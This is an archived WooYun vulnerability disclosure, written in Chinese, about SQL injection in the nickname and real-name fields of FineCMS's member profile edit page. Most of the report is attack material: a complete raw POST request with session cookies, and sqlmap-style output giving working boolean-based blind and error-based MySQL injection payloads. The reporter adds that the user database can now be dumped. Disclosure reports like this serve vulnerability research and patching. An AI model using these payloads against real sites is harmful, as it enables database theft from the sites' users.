乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-14: 细节已通知厂商并且等待厂商处理中 2015-07-17: 厂商已经确认,细节仅向厂商公开 2015-07-27: 细节向核心白帽子及相关领域专家公开 2015-08-06: 细节向普通白帽子公开 2015-08-16: 细节向实习白帽子公开 2015-08-31: 细节向公众公开
还是昨天的我哦。。。只是昨天还没有测到这个洞。。。这个也要回复:问题真实存在但是影响不大吗?愿与君共勉。。。
漏洞地址:../index.php?s=member&c=info&a=edit
漏洞存在位置:会员昵称和姓名两处
代码区:POST /finecms/index.php?s=member&c=info&a=edit HTTP/1.1Host: www.test.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.test.com/finecms/index.php?s=member&c=info&a=editCookie: finecms_b1bf4_member_id=3; finecms_b1bf4_member_code=3382b20ba7587cfe0044; finecms_b1bf4_ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2272eee757a167904d1776a6ac44b4a55f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.2%3B+WOW64%3B+rv%3A18.0%29+Gecko%2F20100101+Firefox%2F18.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435919779%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dc3b3ae032296e75fc6cd251bd380af58f0f65efaConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 84data%5Bnickname%5D=sec&data%5Bxingming%5D=he1&submit=%E4%BF%9D+%E5%AD%98
受影响参数data[nickname]和data[xingming]
Place: POSTParameter: data[nickname] Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: data[nickname]=sec' RLIKE (SELECT (CASE WHEN (2742=2742) THEN 0x736563 ELSE 0x28 END)) AND 'wBOG'='wBOG&data[xingming]=fei&submit=%E4%BF%9D %E5%AD%98 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: data[nickname]=sec' AND (SELECT 8922 FROM(SELECT COUNT(*),CONCAT(0x7169757571,(SELECT (CASE WHEN (8922=8922) THEN 1 ELSE 0 END)),0x71716e7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zLen'='zLen&data[xingming]=fei&submit=%E4%BF%9D %E5%AD%98
可以脱裤子了。。
过滤那两个
危害等级:高
漏洞Rank:20
确认时间:2015-07-17 13:44
添加对漏洞的补充说明以及做出评价的理由21
暂无